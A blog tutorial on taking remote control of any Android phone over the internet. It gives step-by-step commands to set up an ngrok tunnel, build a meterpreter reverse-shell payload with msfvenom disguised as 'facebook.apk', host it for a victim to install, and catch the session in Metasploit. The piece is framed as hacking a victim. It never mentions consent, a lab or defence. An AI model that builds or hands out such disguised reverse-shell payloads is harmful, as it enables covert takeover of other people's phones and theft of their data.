Sponsored
Ethical Hacking

How to Hack Android Phone over the WAN

As you know we already discussed about android hacking over LAN ( Local Area Network ). Click here to see. Now in this article we will talk about how to access any android phone over WAN ( Wide Area Network ) without port forwarding.

What is LAN ?

Local area network is also known as computer network which can be used only for limited area such as college, university, campus, office etc.

What is WAN ?

Wide area network is a telecommunication network which can be used for large geographical communication purpose.

How Ngrok works?

Ngork is like a reverse proxy which create a tunnel between server and client and when client access your webserver, the traffic will come to you through the ngrok proccess. In simple words, the ngrok convert your localhost into public.

Lets Begin !!

We need to first signup on ngrok.

After signup go to ngrok dashboard, copy the ngrok token and download it on the basis of your operating system (OS).

Start your kali linux and navigate terminal on desktop. Now unzip the ngrok file and place it in your favorite directory.

Paste your token where you have placed the ngrok file.

After pasting the token you will observe ngrok file will be created automatically. You need to go on that file and paste the below given code.

nano /root/.ngrok2/ngrok.yml
tunnels:
  httpbin:
    proto: http
    addr: 80
  demo:
    proto: tcp
    addr: 4444

That’s it ! You have done the configuration of ngrok.

Start your ngrok server using the following commands.

./ngrok start --all

When the connection established two terminals will open in front of you. Now copy the highlighted TCP tunnel, go to the new terminal and ping it there so that we can get the public IP address.

ping 0.tcp.ngrok.io

You need one public port which you will get in terminal.

After getting IP address and port you need to create a payload using the following command.

msfvenom -p android/meterpreter/reverse_tcp lhost=3.13.191.225 lport=14416 R > facebook.apk

For controlling this payload start metasploit framework and execute the following commands.

msfconsole
se exploit/multi/handler 
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit

If you want to share your payload to anyone so configure apache on kali linux and move payload on that directory as given below.

You can use this link for sharing the payload which you will get on terminal.

Once victim installed and open the payload, you will observe meterpreter session will open.

BOOM !! You hacked victim.

Sponsored
Shubham Goyal

A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.

View Comments

Recent Posts

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

4 months ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

9 months ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

9 months ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 year ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

2 years ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

3 years ago
Sponsored

This website uses cookies.